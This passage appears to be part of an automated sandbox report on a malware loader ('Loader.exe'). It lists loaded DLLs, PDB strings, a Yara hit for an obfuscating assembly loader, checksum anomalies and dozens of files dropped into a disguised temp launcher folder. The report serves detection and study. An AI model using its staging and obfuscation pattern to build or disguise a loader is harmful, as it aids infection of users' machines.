                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: sxs.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: scrrun.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: linkinfo.dll
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: mswsock.dll
                    Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Loader.exeStatic file information: File size 96490794 > 1048576
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeFile opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr100.dllJump to behavior
                    Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb8^(kdw&k source: javaw.exe, 00000003.00000002.4549234661.000000006B249000.00000002.00000001.01000000.00000014.sdmp
                    Source: Binary string: msvcr100.i386.pdb source: javaw.exe, 00000003.00000002.4553754247.000000006C301000.00000020.00000001.01000000.00000008.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, 00000003.00000002.4551278707.000000006BE77000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdbic source: javaw.exe, 00000003.00000002.4551278707.000000006BE77000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, 00000003.00000002.4551788732.000000006BEEA000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: msvcp120.i386.pdb source: javaw.exe, 00000003.00000002.4550390578.000000006BD01000.00000020.00000001.01000000.00000010.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb source: javaw.exe, 00000003.00000002.4549234661.000000006B249000.00000002.00000001.01000000.00000014.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, 00000003.00000002.4551504864.000000006BECD000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: medicalanalysis.exe
                    Source: Binary string: C:\Users\devuser\Documents\Visual Studio 2017\Projects\IBuilder\Release\NAct.pdb source: Loader.exe, 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe, 00000003.00000000.2174031864.000000000075C000.00000002.00000001.01000000.00000007.sdmp, javaw.exe, 00000003.00000002.4531740229.000000000075C000.00000002.00000001.01000000.00000007.sdmp

                    Data Obfuscation

                    barindex
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 13.2.medicalanalysis.exe.5940000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2831006942.00000000026E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2858444058.0000000005940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                    Source: NAct.dll.0.drStatic PE information: real checksum: 0x35f7b should be: 0x3cde6
                    Source: UAC.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xde12
                    Source: uninst.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x23c08
                    Source: jfxwebkit.dll.0.drStatic PE information: section name: .unwante
                    Source: prism_sw.dll.0.drStatic PE information: section name: _RDATA
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_159BCAB7 pushad ; retf 3_3_159BCAC5
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_159C20DA push B0159C21h; ret 3_3_159C20E9
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_159C5E4B push ss; retn 0002h3_3_159C5E4C
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C02445 push es; ret 3_3_15C02448
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C02445 push es; ret 3_3_15C02448
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C02445 push es; ret 3_3_15C02448
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01D57 push ecx; ret 3_3_15C01D58
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01D57 push ecx; ret 3_3_15C01D58
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01D57 push ecx; ret 3_3_15C01D58
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01FE1 pushad ; ret 3_3_15C02010
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01FE1 pushad ; ret 3_3_15C02010
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01FE1 pushad ; ret 3_3_15C02010
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C02387 push cs; ret 3_3_15C023D0
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C02387 push cs; ret 3_3_15C023D0
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C02387 push cs; ret 3_3_15C023D0
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01E17 push edi; ret 3_3_15C01E18
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01E17 push edi; ret 3_3_15C01E18
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01E17 push edi; ret 3_3_15C01E18
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C0241D push edx; ret 3_3_15C02430
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C0241D push edx; ret 3_3_15C02430
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C0241D push edx; ret 3_3_15C02430
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01234 push 46ED0000h; retf 0077h3_3_15C0123A
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01234 push 46ED0000h; retf 0077h3_3_15C0123A
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01234 push 46ED0000h; retf 0077h3_3_15C0123A
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01E35 push edi; ret 3_3_15C01E48
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01E35 push edi; ret 3_3_15C01E48
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01E35 push edi; ret 3_3_15C01E48
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_159FD859 pushfd ; iretd 3_3_159FD85A
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15BE57AA push eax; retf 3_3_15BE57AB
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15BE57AA push eax; retf 3_3_15BE57AB
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15BE57AA push eax; retf 3_3_15BE57AB
                    Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.90903234258047
                    Source: msvcr100.dll0.0.drStatic PE information: section name: .text entropy: 6.90903234258047
                    Source: msvcr120.dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pcsc.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\w2k_lsa_auth.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\mlib_image.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge-32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\deploy.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr100.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\plugin2\npjp2.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\deployJava1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\servertool.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kcms.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\resource.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\policytool.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxmedia.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jabswitch.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jli.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaws.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\npt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jpeg.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jawt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\lcms.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsoundds.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxwebkit.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcp120.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glass.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsdt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\keytool.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pkcs11.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\nio.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr120.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\t2k.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\unpack200.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\decora_sse.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\gstreamer-lite.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\verify.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ssv.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\tnameserv.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\plugin2\msvcr100.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\nscB629.tmp\UAC.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_d3d.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\npdeployJava1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\orbd.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\bci.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font_t2k.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_iio.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\hprof.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2native.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\sunmscapi.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kinit.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_common.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\splashscreen.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\rmiregistry.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\instrument.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\CampaignHardwareLauncher\uninst.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_sw.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeFile created: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\pack200.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ssvagent.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\klist.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\eula.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\unpack.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\sunec.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2ssv.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java_crw_demo.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfr.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_shmem.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ktab.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fontmanager.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jaas_nt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jjs.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2launcher.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fxplugins.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\wsdetect.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\client\jvm.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_socket.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\rmid.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.cplJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dcpr.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java-rmi.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\net.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge-32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsound.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glib-lite.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge-32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jdwp.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2iexp.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\zip.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\awt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\management.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.cplJump to dropped file
